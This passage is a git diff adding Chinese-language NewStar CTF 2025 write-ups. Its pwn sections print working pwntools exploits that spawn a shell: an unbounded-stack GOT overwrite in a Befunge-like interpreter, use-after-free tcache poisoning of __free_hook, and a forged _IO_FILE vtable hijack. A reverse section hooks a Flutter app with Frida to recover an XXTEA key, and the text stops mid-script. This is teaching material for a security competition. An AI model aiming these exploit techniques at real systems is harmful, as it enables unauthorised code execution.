+ case DIR_UP: y = (y - 1 + HEIGHT) % HEIGHT; break; + case DIR_DOWN: y = (y + 1) % HEIGHT; break; + } + } +} + +const char *demo_program[] = { + "v ,*25 <", + "\"v < ", + "\n>~:25* -|v < ", + "t, , ", + "u, >>:| ", + "p, > ^", + "n, ", + "i,", + "\",", + ">^", + NULL +}; + +void load_demo_program() { + for (int row = 0; demo_program[row] != NULL && row < HEIGHT; row++) { + const char *line = demo_program[row]; + int len = 0; + while (line[len] && len < WIDTH) len++; + for (int col = 0; col < len; col++) { + grid[row][col] = line[col]; + } + for (int col = len; col < WIDTH; col++) { + grid[row][col] = ' '; + } + } + int start = 0; + for (; demo_program[start] != NULL && start < HEIGHT; start++); + for (int row = start; row < HEIGHT; row++) { + for (int col = 0; col < WIDTH; col++) { + grid[row][col] = ' '; + } + } +} + +int main(int argc, char *argv[]) { + init(); + load_demo_program(); + interpret(); + return 0; +} +``` + +### 题解 + +首先通过逆向还原出每个指令的意义,可以大概看出 `pc` 在一个二维数组上面运动,具有方向惯性,初始在 `(0, 0)` 的位置,方向为左。 + +文件自带的代码为 + +![Go 程序主逻辑](/assets/images/wp/2025/week5/go-question_1.png) + +首先线下,遇到 `进入字符模式开始压栈,随后输出input>`。 + +进入一个循环,每次输入之后尝试复制字符检测是否为回车 `\x0a`,通过 `|` 进入分支判断。如果输入回车,则跳出输入循环进入输出,直到将栈上全部数据输出,随后重复。 + +![Go 结构体字段分析](/assets/images/wp/2025/week5/go-question_2.png) + +通过观察可以发现栈的类型为qword而且没有上限检测,可以一直push造成溢出,只要不输入回车 + +同时p和g的自修改指令是没有范围限制的 + +![调试得到关键数据](/assets/images/wp/2025/week5/go-question_3.png) + +可以发现stack是在map的低地址的,栈这里向高地址增长,可以覆盖正在执行的指令,但是输入时有一个 : 进行复制,可以选择覆盖第一行在输出结束时进行控制或者是覆盖第二行的v让具有惯性的指针在这一行循环 + +用&进行输入方便控制8个字节内的每一个指令 + +&&&g.&$$保持栈平衡到原来的位置方便修改,同时进行泄露 + +最后用p指令修改got表的rand函数为system,参数就是当前的指令位置写入sh + +getshell + +#### EXP + +```python +from pwn import* +context.update(arch='amd64',os='linux',log_level='debug') +context.terminal=['qterminal','-e'] +libc=ELF('./libc.so.6') +def pack(payload): + return str(int.from_bytes(payload.ljust(8,b'\x00'),'little')).encode()+b'\n' + +dd=0 +if dd: + p=process('./chal') +else: + p=remote('127.0.0.1',9999) + +payload=b'a'*0xff +payload+=b'&' +payload+=b'c' +payload+=b'>' +p.sendlineafter('input',payload) + +payload=b'0\n'*0xff +p.send(payload) +#leak +sleep(1) +p.clean() +byte=[] +for i in range(6): + payload=pack(b'&&&g.&$$') + payload+=str(-2312+i).encode()+b'\n' + payload+=b'0\n' + p.send(payload) + byte.append(p.recv(10,timeout=0.1)) + p.send(b'0\n') + sleep(0.1) + +nums = [int(x) for x in byte] +unsigned = [(x + 256) % 256 for x in nums] +addr_bytes = bytes(unsigned) +addr = int.from_bytes(addr_bytes[:8], 'little') +print("addr:"+hex(addr)) +libc.address=addr-libc.sym['getchar'] +print("libc:"+hex(libc.address)) + +byte=[] +p.clean() +for i in range(6): + payload=pack(b'&&&g.&$$') + payload+=str(-2280+i).encode()+b'\n' + payload+=b'0\n' + p.send(payload) + byte.append(p.recv(10,timeout=0.1)) + p.send(b'0\n') + sleep(0.1) + +nums = [int(x) for x in byte] +unsigned = [(x + 256) % 256 for x in nums] +addr_bytes = bytes(unsigned) +addr = int.from_bytes(addr_bytes[:8], 'little')-0x10A6 +print("base:"+hex(addr)) +target=p64(libc.address+0xdd063) +#vyx + +for i in range(6): + payload=pack(b'&&&&p&$$') + b=target[i] + payload+=str(int.from_bytes(bytes([b]), 'little', signed=True)).encode()+b'\n' + payload+=b'0\n' + payload+=str(-2280+i).encode()+b'\n' + p.send(payload) + p.send(b'0\n') +payload=pack(b'&&&') +payload+=pack(b'?') +payload+=b'0\n' +p.send(payload) +# +p.interactive() +``` diff --git a/docs/wp/2025/week5/pwn/hack-the-world.md b/docs/wp/2025/week5/pwn/hack-the-world.md new file mode 100644 index 0000000..a317b36 --- /dev/null +++ b/docs/wp/2025/week5/pwn/hack-the-world.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# Pwn the world diff --git a/docs/wp/2025/week5/pwn/note.md b/docs/wp/2025/week5/pwn/note.md new file mode 100644 index 0000000..276c44a --- /dev/null +++ b/docs/wp/2025/week5/pwn/note.md @@ -0,0 +1,111 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# note + +程序提供了一个菜单,并且提供了 `add`,`show`,`change`,`release` 的功能,我们逐个函数来看 + +![add 函数分析](/assets/images/wp/2025/week5/note_1.jpg) + +`add` 函数中程序读取了 `index` 和 `size`,并将 `size` 存入 `chunk_size` 中,将 `malloc(size)` 申请到的堆块地址存入 `chunk_list` 中,`chunk_size` 和 `chunk_list` 均为全局变量。随后通过一个 `read` 可以设置堆块的内容。 + +![change 函数分析](/assets/images/wp/2025/week5/note_2.jpg) + +`change` 函数可以通过指定 `index` 设置指定堆块的内容 + +![show 函数分析](/assets/images/wp/2025/week5/note_3.jpg) + +`show` 函数可以通过指定 `index` 去打印指定堆块的内容 + +![release 函数 UAF 漏洞](/assets/images/wp/2025/week5/note_4.jpg) + +`release` 函数允许通过 `index` 去释放指定堆块,但是在 `free` 之后没有将 `chunk_list` 的 `index` 位置置零,因此还是可以通过这个 `index` 去访问这块已经释放的内存,存在一个经典的 `UAF` 漏洞 + +![glibc 版本信息](/assets/images/wp/2025/week5/note_5.jpg) + +由于堆利用手法与版本有关,因此我们查看 glibc 版本 + +![tcache bin 调试信息](/assets/images/wp/2025/week5/note_6.jpg) + +使用 glibc 版本是 `2.27-3ubuntu1.6`,这个版本开启了 `tcache bin`,和用户交互默认为 `tcache bin`,同时在这个版本中存在 `__malloc_hook` 和 `__free_hook` 可以攻击,所以我们考虑通过这个 UAF 去挟持堆块的申请地址,这样下一次申请就可以控制堆块申请到 `__free_hook` 处,这样就可以修改其为 `system` 的地址,这样只要执行 free,堆块中的内容只要是 `/bin/sh` 即可拿到权限 + +如何泄露 libc 呢?当我们申请的堆块足够大,释放后就会进入 `unsorted bin`,在其中会有一个 `libc` 地址,通过这个地址就可以泄露 `libc` 后计算 `system` 和 `__free_hook` 的地址 + +![unsorted bin 泄露 libc](/assets/images/wp/2025/week5/note_7.png) + +```python +from pwn import * +from LibcSearcher import * +from ctypes import * + +context(os="linux",arch="amd64",log_level="debug") + +io = remote("127.0.0.1", 11223) + +# elf = ELF("./pwn") +libc = ELF("./libc-2.27.so") + +def cmd(i, prompt=b"input your choice >>>"): + io.sendlineafter(prompt, i) +def add(idx, size, co): + cmd(b"1") + io.recvuntil(b"input index:") + io.sendline(str(idx).encode()) + io.recvuntil(b"input size") + io.sendline(str(size).encode()) + io.recvuntil(b"input your note:") + io.send(co) + # ...... +def edit(idx, co): + cmd(b"2") + io.recvuntil(b"input index:") + io.sendline(str(idx).encode()) + io.recvuntil(b"input your new note:") + io.send(co) + # ...... +def show(idx): + cmd(b"3") + io.recvuntil(b"input index") + io.sendline(str(idx).encode()) + # ...... +def dele(idx): + cmd(b"4") + io.recvuntil(b"input index") + io.sendline(str(idx).encode()) + # ...... +def dbg(): + gdb.attach(io) + pause() + +add(0, 0x450, b"AAAA") +add(1, 0x50, b"AAAA") +add(2, 0x50, b"AAAA") +add(3, 0x50, b"/bin/sh\x00") +dele(0) +show(0) +libc_base = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))-0x3ebca0 +free_hook = libc_base + libc.sym["__free_hook"] +system = libc_base + libc.sym["system"] +print("libc_base"+hex(libc_base)) +print("free_hook"+hex(free_hook)) +print("system"+hex(system)) + +dele(2) +dele(1) +show(1) +io.recvuntil(b"now, show the note: ") +heap_base = u64(io.recv(6).ljust(8,b'\x00'))-0x720 +print("heap_base"+hex(heap_base)) + +edit(1, p64(free_hook)) +add(4, 0x50, b"BBBB") +add(5, 0x50, p64(system)) + +# gdb.attach(io) +pause() + +dele(3) + +io.interactive() +``` diff --git a/docs/wp/2025/week5/pwn/stdout.md b/docs/wp/2025/week5/pwn/stdout.md new file mode 100644 index 0000000..4976d88 --- /dev/null +++ b/docs/wp/2025/week5/pwn/stdout.md @@ -0,0 +1,136 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# stdout + + + +本题考查 `_IO_FILE` 结构体利用。 + + +开始做这道题之前,需要对 `_IO_FILE` 有基本认识,可以参考: + +- [FILE 结构](https://ctf-wiki.org/pwn/linux/user-mode/io-file/introduction/) +- [FILE 结构体漏洞利用:0x01 介绍](https://www.bilibili.com/video/BV14f421B7zt?spm_id_from=333.788.videopod.sections&vd_source=b005ec5af584b4ef1ded2a09167f88a7) +- [FILE 结构体漏洞利用:0x02 任意读与任意写](https://www.bilibili.com/video/BV18m421g7mZ?spm_id_from=333.788.videopod.sections&vd_source=b005ec5af584b4ef1ded2a09167f88a7) +- [FILE 结构体漏洞利用:0x03 FILE_plus 和 vtable](https://www.bilibili.com/video/BV14T421k7RJ?spm_id_from=333.788.videopod.sections&vd_source=b005ec5af584b4ef1ded2a09167f88a7) + +首先大致分析程序。 + +![IDA 查看 stdout 逻辑](/assets/images/wp/2025/week5/stdout_1.png) + +表面上看,这只是向 bss 段输入的逻辑,实际情况如下: + +- `_bss_start` 是一个文件指针(FILE\*),它与输出流相关联,在 C 语言中,通常 `_bss_start` 会被初始化为标准输出流 `stdout` + +随后程序打印 `stdout` 地址,并执行 `read(0, fp, 0xF0u);`,因此可以劫持 `stdout` 结构体。 + +简而言之,需要修改 vtable,使原本的 `_IO_file_xsputn` 变为 `_IO_wfile_seekoff`。 +![vtable 劫持思路](/assets/images/wp/2025/week5/stdout_2.png) +查看相关源码: + +```c +_IO_wfile_seekoff (FILE *fp, off64_t offset, int dir, int mode) +{ + off64_t result; + off64_t delta, new_offset; + long int count; + + if (mode == 0) + return do_ftell_wide (fp); +...... + + bool was_writing = ((fp->_wide_data->_IO_write_ptr + > fp->_wide_data->_IO_write_base) + || _IO_in_put_mode (fp)); + + if (was_writing && _IO_switch_to_wget_mode (fp)) + return WEOF; +...... +} +``` + +当满足 `fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base` 时,就会调用 `_IO_switch_to_wget_mode`。 +![_IO_switch_to_wget_mode 调用点](/assets/images/wp/2025/week5/stdout_3.png) +![_IO_wfile_seekoff 源码](/assets/images/wp/2025/week5/stdout_4.png) +进入 `_IO_switch_to_wget_mode` 后,关键点在内部调用链。 +![_IO_WOVERFLOW 调用链](/assets/images/wp/2025/week5/stdout_5.png) +继续查看源码: + +```c +int +_IO_switch_to_wget_mode (FILE *fp) +{ + if (fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base) + if ((wint_t)_IO_WOVERFLOW (fp, WEOF) == WEOF) + return EOF; + ...... +} +``` + +大小比较的逻辑体现在这里 +![大小比较逻辑](/assets/images/wp/2025/week5/stdout_6.png) +当满足 `fp->_wide_data->_IO_write_ptr > fp->_wide_data->_IO_write_base` 时,会调用 `_IO_WOVERFLOW(fp)`。而 `_IO_WOVERFLOW` 实际取自 `_wide_data->_wide_vtable`,该地址可控。因此可以在这里布置 `system`,其参数来自 `_flags` 字段,将 `_flags` 字段设置为 `/bin/sh` 即可。 + +本题存在多种利用方式,这里给出其中一种调用链。 + +最后给出 EXP: + +```python +from pwn import * + +context(arch='amd64', log_level = 'debug',os = 'linux') +file='./FILE' +elf=ELF(file) +libc = ELF('./libc.so.6') + +port= +ns='' +p = remote(ns,port) + +# p = process(file) + +# gdb.attach(p) +p.recvuntil('The file You are writing to is: ') +stdout = int(p.recv(14),16) +libc_base = stdout - libc.sym['_IO_2_1_stdout_'] + +payload = p64(0x68732f6e69622f) # _flags = rdi +payload += p64(0) # read ptr +payload += p64(1) # read end +payload += p64(0) # read base +payload += p64(2) # write base +payload += p64(3) # write ptr +payload += p64(0) # write end +payload += p64(0) # buf base +payload += p64(0) # buf end +payload += p64(0) # save base +payload += p64(0) # backup base +payload += p64(libc_base + libc.sym['system']) # save end = call addr = "rax2 + 0x18" +payload += p64(0) # _markers +payload += p64(0) # _chain +payload += p64(0) # _fileno +payload += p64(0) # _old_offset +payload += p64(0) # _cur_column +payload += p64(libc_base + 0x21B730) # _lock +payload += p64(0) # _offset +payload += p64(0) # _codecvx +payload += p64(stdout + 0x8) # _wfile_data rax1 "0xa0" +payload += p64(0) # _freers_list +payload += p64(0) # _freers_buf +payload += p64(0) # ____pad5 +payload += p32(0) # _mode +payload += b'\x00'*20 # _unused2 +payload += p64(libc_base + libc.sym['_IO_wfile_jumps'] + 0x10) +payload += p64(0) # padding +payload += p64(stdout + 0x40) # rax2 + +p.sendafter('now you can write something to the file',payload) + +p.interactive() +``` diff --git a/docs/wp/2025/week5/reverse/an-easy-system.md b/docs/wp/2025/week5/reverse/an-easy-system.md new file mode 100644 index 0000000..231cd73 --- /dev/null +++ b/docs/wp/2025/week5/reverse/an-easy-system.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# AnEasySystem diff --git a/docs/wp/2025/week5/reverse/genius-auth.md b/docs/wp/2025/week5/reverse/genius-auth.md new file mode 100644 index 0000000..e51a4f5 --- /dev/null +++ b/docs/wp/2025/week5/reverse/genius-auth.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 天才的「认证」 diff --git a/docs/wp/2025/week5/reverse/hetu-luoshu.md b/docs/wp/2025/week5/reverse/hetu-luoshu.md new file mode 100644 index 0000000..ccef0fa --- /dev/null +++ b/docs/wp/2025/week5/reverse/hetu-luoshu.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 河图洛书 diff --git a/docs/wp/2025/week5/reverse/jvav-master.md b/docs/wp/2025/week5/reverse/jvav-master.md new file mode 100644 index 0000000..5fa2258 --- /dev/null +++ b/docs/wp/2025/week5/reverse/jvav-master.md @@ -0,0 +1,5 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# Jvav Master diff --git a/docs/wp/2025/week5/reverse/magical-girl-secret.md b/docs/wp/2025/week5/reverse/magical-girl-secret.md new file mode 100644 index 0000000..7f58d69 --- /dev/null +++ b/docs/wp/2025/week5/reverse/magical-girl-secret.md @@ -0,0 +1,640 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + +# 魔法少女的秘密 + +使用 [Bluter](https://github.com/worawit/blutter) 解包 `flutter`。 +用 `blutter` 解出来,然后比较明显一个加密一个调用 + +打开 `asm` 文件夹看 `drink.dart` + +```dart +// lib: , url: package:magical_girl/drink.dart + +// class id: 1048975, size: 0x8 +class :: { +} + +// class id: 186, size: 0x8, field offset: 0x8 +// const constructor, +class drink extends Object { + + _ encrypt(/* No info */) { + // --asm-- + } + _ _encryptUint32List(/* No info */) { + // --asm-- + } + _ _fixkey(/* No info */) { + // --asm-- + } + _ _toUint32List(/* No info */) { + // --asm-- + } +} +``` + +全是汇编,所以直接去 IDA 中运行脚本,再搜索函数 `encrypt` 可以找到。 + +`magical_girl_drink_drink::encrypt_297350()` 函数 + +```cpp + *(_QWORD *)(v0 - 16) = v5; + *(_QWORD *)(v0 - 8) = v6; + v7 = v0 - 16; + v8 = (_QWORD *)(v0 - 72); + if ( (unsigned __int64)v8 <= *(_QWORD *)(v2 + 56) ) + ((void (*)(void))StackOverflowSharedWithoutFPURegsStub_3b1f64)(); + v9 = *(_QWORD *)(v3 + 3792); + *v8 = *(_QWORD *)(v7 + 24); + v8[1] = v9; + *(_QWORD *)(v7 - 8) = dart_convert_Utf8Encoder::convert_309850(); + v10 = *(_QWORD *)(v3 + 3792); + *v11 = *(_QWORD *)(v3 + 46752); + v11[1] = v10; + v12 = dart_convert_Utf8Encoder::convert_309850(); + result = *(_QWORD *)(v7 - 8); + *(_QWORD *)(v7 - 16) = v12; + if ( *(_DWORD *)(result + 19) ) + { + v15 = *(_QWORD *)(v7 + 32); + v13[1] = result; + v13[2] = v15; + *v13 = v1 + 32; + *(_QWORD *)(v7 - 8) = magical_girl_drink_drink::_toUint32List_297aec(); + v16 = *(_QWORD *)(v7 + 32); + *v17 = *(_QWORD *)(v7 - 16); + v17[1] = v16; + v18 = magical_girl_drink_drink::_fixkey_297908(); + v19 = *(_QWORD *)(v7 + 32); + v20[1] = v18; + v20[2] = v19; + *v20 = v1 + 48; + v21 = magical_girl_drink_drink::_toUint32List_297aec(); + v22 = *(_QWORD *)(v7 + 32); + v23[1] = *(_QWORD *)(v7 - 8); + v23[2] = v22; + *v23 = v21; + v24 = ((__int64 (*)(void))magical_girl_drink_drink::_encryptUint32List_2974e0)(); + // .. + } +``` + +从代码来看,程序会将 FLAG 和 `key` 都转换为 `u32`,再进入加密函数 `magical_girl_drink_drink::_encryptUint32List_2974e0`。 + +看一下上层调用 `magical_girl_EditView_MyEditTextState::check_2972a8` + +```c +__int64 __fastcall magical_girl_EditView_MyEditTextState::check_2972a8( + __int64 input, + __int64 a2, + __int64 a3, + __int64 a4, + __int64 a5, + __int64 a6, + __int64 a7) +{ + __int64 v7; // x15 + __int64 v8; // x26 + _QWORD *v9; // x27 + __int64 v10; // x28 + __int64 v11; // x29 + __int64 v12; // x30 + __int64 v13; // x29 + _QWORD *v14; // x15 + __int64 v15; // x16 + __int64 v16; // x0 + __int64 *v17; // x15 + __int64 v18; // x1 + __int64 v19; // x16 + __int64 *v20; // x15 + __int64 v21; // x1 + __int64 v22; // x2 + + *(_QWORD *)(v7 - 16) = v11; + *(_QWORD *)(v7 - 8) = v12; + v13 = v7 - 16; + v14 = (_QWORD *)(v7 - 48); + if ( (unsigned __int64)v14 <= *(_QWORD *)(v8 + 56) ) + StackOverflowSharedWithoutFPURegsStub_3b1f64(input, a2, a3, a4, a5, a6, a7); + v15 = v9[5843]; + v14[1] = *(_QWORD *)(v13 + 16); + v14[2] = v15; + *v14 = v9[5844]; + v16 = magical_girl_drink_drink::encrypt_297350(); + *(_QWORD *)(v13 - 8) = v16; + *v17 = v16; + dart_core_::print_1aa6a4(); + v18 = *(unsigned int *)(*(_QWORD *)(v13 + 24) + 27LL) + (v10 << 32); + v19 = v9[260]; + v20[1] = *(_QWORD *)(v13 - 8); + v20[2] = v19; + *v20 = v18; + if ( (flutter_src_foundation_collections_::listEquals_1d58b8() & 0x10) != 0 ) + { + v21 = *(_QWORD *)(v13 + 24); + v22 = v9[5846]; + } + else + { + v21 = *(_QWORD *)(v13 + 24); + v22 = v9[5845]; + } + *(_DWORD *)(v21 + 19) = v22; + return v9[62]; +} +``` + +这里应该是与密文进行判断 + +```c +if ( (flutter_src_foundation_collections_::listEquals_1d58b8() & 0x10) != 0 ) +``` + +找到这个函数 https://api.flutter.dev/flutter/foundation/listEquals.html + +传入 2 个 list,猜测其中一个为加密的输入,另一个就是密文,分析完成。 + +现在先用 `blutter` 给出的 `frida` 脚本 `hook` 一下加密函数 `magical_girl_drink_drink::_encryptUint32List_2974e0` + +```js +const ShowNullField = false; +const MaxDepth = 5; +var libapp = null; + +function pr(_this, idx) { + init(_this.context); + let objPtr = getArg(_this.context, idx); + const [tptr, cls, values] = getTaggedObjectValue(objPtr); + console.log(`${cls.name}@${tptr.toString().slice(2)} =`, JSON.stringify(values, null, 2)); +} + +function onLibappLoaded() { + // xxx("remove this line and correct the hook value"); + const fn_addr = 0x2974e0; + Interceptor.attach(libapp.add(fn_addr), { + onEnter: function (args) { + pr(this, 0); + pr(this, 1); + }, + onLeave: function (retval) { + pr(this, 1); + }, + }); +} + +function tryLoadLibapp() { + try { + libapp = Module.findBaseAddress("libapp.so"); + } catch (e) { + if (e instanceof TypeError && e.message === "not a function") { + libapp = Process.findModuleByName("libapp.so"); + if (libapp != null) { + libapp = libapp.base; + } + } else { + throw e; + } + } + if (libapp === null) setTimeout(tryLoadLibapp, 500); + else onLibappLoaded(); +} +tryLoadLibapp(); +// more is being skipped +``` + +在root机中打开应用 + +```shell +frida -U -F work.pangbai.magic.magical_girl -l blutter_frida.js -o out.txt +``` + +可以看到输入的测试密文和密钥以及被加密的输入 + +```js +_Uint32List@6e00817cd9 = [ + 1936287828, + 1264677705, + 1870100837, + 1870098295 +] +_Uint32List@6e00817c89 = [ + 943011893, + 4 +] + +// 函数返回时 +_Uint32List@6e00817c89 = [ + 496308832, + 3081350031 +] +``` + +第一个数组转为字符串就是 `ThisIsaKeywowowo` 肯定是 `Key` 了 + +分析一下这个加密函数 + +```cpp +__int64 __usercall magical_girl_drink_drink::_encryptUint32List_2974e0@( + __int64 a1@, + __int64 a2@, + __int64 a3@, + __int64 a4@, + __int64 a5@, + __int64 a6@, + __int64 a7@, + __int64 a8@) +{ + __int64 v8; // x15 + __int64 v9; // x26 + __int64 v10; // x27 + __int64 v11; // x29 + __int64 v12; // x30 + __int64 v13; // x29 + _QWORD *v14; // x15 + __int64 v15; // x2 + __int64 v16; // x3 + __int64 v17; // x5 + __int64 v18; // x6 + __int64 v19; // x2 + __int64 v20; // x4 + signed __int64 MintSharedWithoutFPURegsStub_3b20e4; // x0 + __int64 v22; // x2 + signed __int64 v23; // x1 + __int64 v24; // x0 + int v25; // w2 + __int64 v26; // x2 + __int64 v27; // x1 + __int64 v28; // x2 + _QWORD *v29; // x15 + __int64 v30; // x4 + __int64 v31; // x3 + __int64 v32; // x5 + __int64 v33; // x0 + __int64 v34; // x6 + __int64 v35; // x11 + __int64 v36; // x7 + __int64 v37; // x10 + __int64 v38; // x8 + signed __int64 v39; // x0 + __int64 v40; // x3 + __int64 v41; // x4 + __int64 v42; // x1 + __int64 v43; // x0 + __int64 v44; // x0 + __int64 v45; // x2 + __int64 v46; // x1 + unsigned __int64 v47; // x0 + __int64 v48; // x3 + __int64 v49; // x1 + __int64 v50; // x2 + __int64 v51; // x16 + __int64 v52; // x0 + __int64 v54; // x0 + __int64 v55; // x5 + __int64 v56; // x6 + __int64 v57; // x15 + __int64 v58; // x2 + __int64 v59; // x3 + __int64 v60; // x0 + + *(_QWORD *)(v8 - 16) = v11; + *(_QWORD *)(v8 - 8) = v12; + v13 = v8 - 16; + v14 = (_QWORD *)(v8 - 128); + v15 = 52; + if ( (unsigned __int64)v14 <= *(_QWORD *)(v9 + 56) ) + StackOverflowSharedWithoutFPURegsStub_3b1f64(a1, a2, 52, a3, a4, a5, a6); + v16 = *(_QWORD *)(v13 + 24); + v17 = (__int64)*(int *)(v16 + 19) >> 1; + *(_QWORD *)(v13 - 56) = v17; + v18 = v17 - 1; + *(_QWORD *)(v13 - 48) = v17 - 1; + if ( !v17 ) + { + v54 = ((__int64 (*)(void))RangeErrorSharedWithoutFPURegsStub_3b23ac)(); + *(_QWORD *)(v57 - 16) = v55; + *(_QWORD *)(v57 - 8) = v56; + v57 -= 16; + *(_QWORD *)(v57 - 16) = v58; + *(_QWORD *)(v57 - 8) = v59; + *(_QWORD *)(v57 - 24) = v54; + v24 = (*(__int64 (**)(void))(v9 + 504))(); + __break(0); +LABEL_28: + StackOverflowSharedWithoutFPURegsStub_3b1f64(v24, v23, v26, v16, v20, v17, v18); + goto LABEL_8; + } + v19 = v15 / v17 + 6; + v20 = *(unsigned int *)(v16 + 4 * v18 + 23); + MintSharedWithoutFPURegsStub_3b20e4 = 2 * (int)v19; + if ( v19 != MintSharedWithoutFPURegsStub_3b20e4 >> 1 ) + { + MintSharedWithoutFPURegsStub_3b20e4 = AllocateMintSharedWithoutFPURegsStub_3b20e4(v19, v16, v20, v17, v18, a7, a8); + *(_QWORD *)(MintSharedWithoutFPURegsStub_3b20e4 + 7) = v22; + } + v23 = MintSharedWithoutFPURegsStub_3b20e4; + v24 = *(_QWORD *)(v13 + 16); + v25 = *(_DWORD *)(v24 + 19); + *(_QWORD *)(v13 - 40) = (__int64)v25 >> 1; + *(_QWORD *)(v13 - 32) = (__int64)v25 >> 1; + v26 = 0; + while ( 2 ) + { + *(_QWORD *)(v13 - 8) = v20; + *(_QWORD *)(v13 - 16) = v26; + *(_QWORD *)(v13 - 24) = v23; + if ( (unsigned __int64)v14 <= *(_QWORD *)(v9 + 56) ) + goto LABEL_28; +LABEL_8: + *v14 = 0; + v14[1] = v23; + if ( ((*(__int64 (__fastcall **)(_QWORD))(v10 + 46784))(v14[1]) & 0x10) != 0 ) + return *(_QWORD *)(v13 + 24); + v30 = 1131796; + v31 = 3; + v32 = (unsigned int)*(_QWORD *)(v13 - 16) + 1131796; + *(_QWORD *)(v13 - 96) = v32; + v33 = (unsigned int)v32 >> 2; + v34 = v33 & 3; + *(_QWORD *)(v13 - 88) = v34; + v35 = *(_QWORD *)(v13 - 8); + v36 = *(_QWORD *)(v13 + 24); + v37 = 0; + while ( 1 ) + { + v38 = *(_QWORD *)(v13 - 48); + *(_QWORD *)(v13 - 72) = v35; + *(_QWORD *)(v13 - 80) = v37; + if ( (unsigned __int64)v29 <= *(_QWORD *)(v9 + 56) ) + StackOverflowSharedWithoutFPURegsStub_3b1f64(v33, v27, v28, 3, 1131796, v32, v34); + v39 = 2 * (int)v37; + if ( v37 != v39 >> 1 ) + { + v39 = AllocateMintSharedWithoutFPURegsStub_3b20e4(v28, v31, v30, v32, v34, v36, v38); + *(_QWORD *)(v39 + 7) = v37; + } + *(_QWORD *)(v13 - 64) = v39; + if ( v37 >= v38 ) + break; + *(_QWORD *)(v13 - 16) = v37 + 1; + *(_QWORD *)(v13 - 8) = *(unsigned int *)(v36 + 4 * (v37 + 1) + 23); + if ( (v39 & 1) != 0 && (unsigned __int64)((unsigned int)*(_QWORD *)(v39 - 1) >> 12) - 59 > 1 ) + IsType_int_Stub_3cf048(); + v40 = *(_QWORD *)(v13 + 24); + v41 = *(_QWORD *)(v13 - 80); + v28 = *(unsigned int *)(v40 + 4 * v41 + 23); + if ( (v41 & 3 ^ (unsigned __int64)(unsigned int)*(_QWORD *)(v13 - 88)) >= *(_QWORD *)(v13 - 40) ) + { + v43 = ((__int64 (*)(void))RangeErrorSharedWithoutFPURegsStub_3b23ac)(); + goto LABEL_30; + } + v42 = (unsigned int)*(_QWORD *)(v13 - 8); + LODWORD(v33) = v28 + + ((((*(__int64 *)(v13 - 72) >> 5) ^ (4 * v42)) + ((v42 >> 3) ^ (16 * *(_QWORD *)(v13 - 72)))) + ^ ((*(_QWORD *)(v13 - 96) ^ v42) + + (*(_DWORD *)(*(_QWORD *)(v13 + 16) + + 4 * (*(_QWORD *)(v13 - 80) & 3LL ^ (unsigned int)*(_QWORD *)(v13 - 88)) + + 23) + ^ *(_QWORD *)(v13 - 72)))); + v27 = v40 + 4 * v41; + *(_DWORD *)(v27 + 23) = v33; + v33 = (unsigned int)v33; + v35 = (unsigned int)v33; + v37 = *(_QWORD *)(v13 - 16); + v36 = v40; + v32 = *(_QWORD *)(v13 - 96); + v34 = *(_QWORD *)(v13 - 88); + v31 = 3; + v30 = 1131796; + } + v43 = *(_QWORD *)(v13 - 56); + if ( !v43 ) + { +LABEL_30: + v47 = RangeErrorSharedWithoutFPURegsStub_3b23ac(v43); + break; + } + *(_QWORD *)(v13 - 16) = *(unsigned int *)(v36 + 23); + v44 = *(_QWORD *)(v13 - 64); + *(_QWORD *)(v13 - 8) = *(unsigned int *)(v36 + 4 * v38 + 23); + if ( (v44 & 1) != 0 && (unsigned __int64)((unsigned int)*(_QWORD *)(v44 - 1) >> 12) - 59 > 1 ) + IsType_int_Stub_3cf048(); + v47 = *(_QWORD *)(v13 - 32); + if ( (*(_QWORD *)(v13 - 80) & 3LL ^ (unsigned __int64)(unsigned int)*(_QWORD *)(v13 - 88)) < v47 ) + { + v46 = (unsigned int)*(_QWORD *)(v13 - 16); + v45 = *(_QWORD *)(v13 - 72); + v48 = (unsigned int)*(_QWORD *)(v13 - 8) + + ((((unsigned int)(v45 >> 5) ^ (4 * (_DWORD)v46)) + ((unsigned int)(v46 >> 3) ^ (16 * (_DWORD)v45))) + ^ (((unsigned int)*(_QWORD *)(v13 - 96) ^ (unsigned int)v46) + + (*(_DWORD *)(*(_QWORD *)(v13 + 16) + + 4 * (*(_QWORD *)(v13 - 80) & 3LL ^ (unsigned int)*(_QWORD *)(v13 - 88)) + + 23) + ^ (unsigned int)v45))); + v49 = *(_QWORD *)(v13 + 24); + v50 = *(_QWORD *)(v13 - 48); + *(_QWORD *)(v13 - 16) = v48; + *(_DWORD *)(v49 + 4 * v50 + 23) = v48; + v51 = *(_QWORD *)(v13 - 24); + *v29 = 2; + v29[1] = v51; + v52 = (*(__int64 (__fastcall **)(_QWORD, __int64, __int64, __int64, _QWORD, _QWORD))(v10 + 46832))( + v29[1], + v49, + v50, + v48, + 0, + *(_QWORD *)(v10 + 46824)); + v26 = (unsigned int)*(_QWORD *)(v13 - 96); + v20 = (unsigned int)*(_QWORD *)(v13 - 16); + v23 = v52; + v16 = *(_QWORD *)(v13 + 24); + v24 = *(_QWORD *)(v13 + 16); + v18 = *(_QWORD *)(v13 - 48); + v17 = *(_QWORD *)(v13 - 56); + continue; + } + break; + } + v60 = RangeErrorSharedWithoutFPURegsStub_3b23ac(v47); + return magical_girl_drink_drink::_fixkey_297908(v60); +} +``` + +应该是一个 `XXTEA`,`1131796` 的 16 进制为 `0x114514`,还有加法操作,可以知道只更改了 `DELTA=0x114514`。 + +解密算法没有问题了,现在只需要找到密文。刚刚分析了对比密文和输入的位置是在函数 `flutter_src_foundation_collections_::listEquals_1d58b8()` 进行的,使用 `frida hook` 查看传入的参数。 + +```js +const ShowNullField = false; +const MaxDepth = 5; +var libapp = null; + +function 